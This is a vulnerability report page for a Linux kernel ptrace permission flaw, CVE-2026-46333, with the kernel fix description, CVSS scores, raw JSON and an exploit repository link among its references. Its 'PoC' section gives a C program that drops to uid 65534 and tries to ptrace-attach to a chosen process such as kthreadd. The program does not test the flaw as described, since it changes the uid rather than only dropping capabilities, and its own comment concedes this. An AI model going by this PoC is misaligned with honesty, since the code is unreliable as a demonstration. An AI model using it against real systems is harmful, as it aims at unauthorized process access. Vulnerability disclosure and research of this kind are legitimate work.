Security Vulnerability Report
CVE-2026-46333 CVSS 7.1 HIGH

CVE-2026-46333

Published: 2026-05-15 14:16:36
Last Modified: 2026-05-20 17:16:25
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ptrace: slightly saner 'get_dumpable()' logic

The 'dumpability' of a task is fundamentally about the memory image of the task - the concept comes from whether it can core dump or not - and makes no sense when you don't have an associated mm.

And almost all users do in fact use it only for the case where the task has a mm pointer.

But we have one odd special case: ptrace_may_access() uses 'dumpable' to check various other things entirely independently of the MM (typically explicitly using flags like PTRACE_MODE_READ_FSCREDS). Including for threads that no longer have a VM (and maybe never did, like most kernel threads).

It's not what this flag was designed for, but it is what it is.

The ptrace code does check that the uid/gid matches, so you do have to be uid-0 to see kernel thread details, but this means that the traditional "drop capabilities" model doesn't make any difference for this all.

Make it all make a *bit* more sense by saying that if you don't have a MM pointer, we'll use a cached "last dumpability" flag if the thread ever had a MM (it will be zero for kernel threads since it is never set), and require a proper CAP_SYS_PTRACE capability to override.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Linux Kernel (versions before the fix commit)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * PoC for CVE-2026-46333: Linux Kernel ptrace Permission Bypass
 * This code attempts to ptrace a kernel thread (e.g., kthreadd) after
 * dropping privileges, demonstrating the bypass of the 'drop capabilities'
 * model due to the flawed 'get_dumpable()' logic.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <errno.h>

int main(int argc, char *argv[])
{
    pid_t target_pid;

    if (argc < 2) {
        printf("Usage: %s <pid>\n", argv[0]);
        printf("Example: %s 2 (for kthreadd)\n", argv[0]);
        return 1;
    }
    target_pid = atoi(argv[1]);
    printf("[+] Attempting to ptrace attach to PID %d...\n", target_pid);

    // Simulate dropping privileges to demonstrate the bypass
    // Assuming the PoC is run as root initially to show the flaw
    // Note (per the description above): ptrace_may_access() still requires a
    // matching uid/gid, so changing uid also changes which check is exercised;
    // the issue described is about dropped capabilities, not a changed uid.
    if (getuid() == 0) {
        printf("[+] Running as root. Dropping privileges to 'nobody' (uid 65534)...\n");
        if (setuid(65534) != 0) {
            perror("[-] setuid failed");
            return 1;
        }
    }
    printf("[+] Current UID: %d\n", getuid());

    // Attempt to attach to the target process
    if (ptrace(PTRACE_ATTACH, target_pid, NULL, NULL) == -1) {
        perror("[-] ptrace failed");
        printf("[-] Access denied or error occurred.\n");
        return 1;
    }
    printf("[+] SUCCESS: ptrace attach succeeded!\n");
    printf("[+] This indicates a potential bypass of the capability check.\n");

    // Detach from the target
    ptrace(PTRACE_DETACH, target_pid, NULL, NULL);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46333", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-15T14:16:35.793", "lastModified": "2026-05-20T17:16:24.950", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nptrace: slightly saner 'get_dumpable()' logic\n\nThe 'dumpability' of a task is fundamentally about the memory image of\nthe task - the concept comes from whether it can core dump or not - and\nmakes no sense when you don't have an associated mm.\n\nAnd almost all users do in fact use it only for the case where the task\nhas a mm pointer.\n\nBut we have one odd special case: ptrace_may_access() uses 'dumpable' to\ncheck various other things entirely independently of the MM (typically\nexplicitly using flags like PTRACE_MODE_READ_FSCREDS). Including for\nthreads that no longer have a VM (and maybe never did, like most kernel\nthreads).\n\nIt's not what this flag was designed for, but it is what it is.\n\nThe ptrace code does check that the uid/gid matches, so you do have to\nbe uid-0 to see kernel thread details, but this means that the\ntraditional \"drop capabilities\" model doesn't make any difference for\nthis all.\n\nMake it all make a *bit* more sense by saying that if you don't have a\nMM pointer, we'll use a cached \"last dumpability\" flag if the thread\never had a MM (it will be zero for kernel threads since it is never\nset), and require a proper CAP_SYS_PTRACE capability to override."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": 
"NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://git.kernel.org/stable/c/01363cb3fbd0238ffdeb09f53e9039c9edf8a730", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/15b828a46f305ae9f05a7c16914b3ce273474205", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/2a93a4fac7b6051d3be7cd1b015fe7320cd0404d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/4709234fd1b95136ceb789f639b1e7ea5de1b181", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/6e5b51e74a40d377bcd3081dd33fbaa0e1aa7e3d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/8f907d345bae8f4b3f004c5abc56bf2dfb851ea7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/93d4ba49d18e3d7fb41a9927c2d0cca5e9dfefd6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/15/9", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00032.html", "source": 
"af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00035.html", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}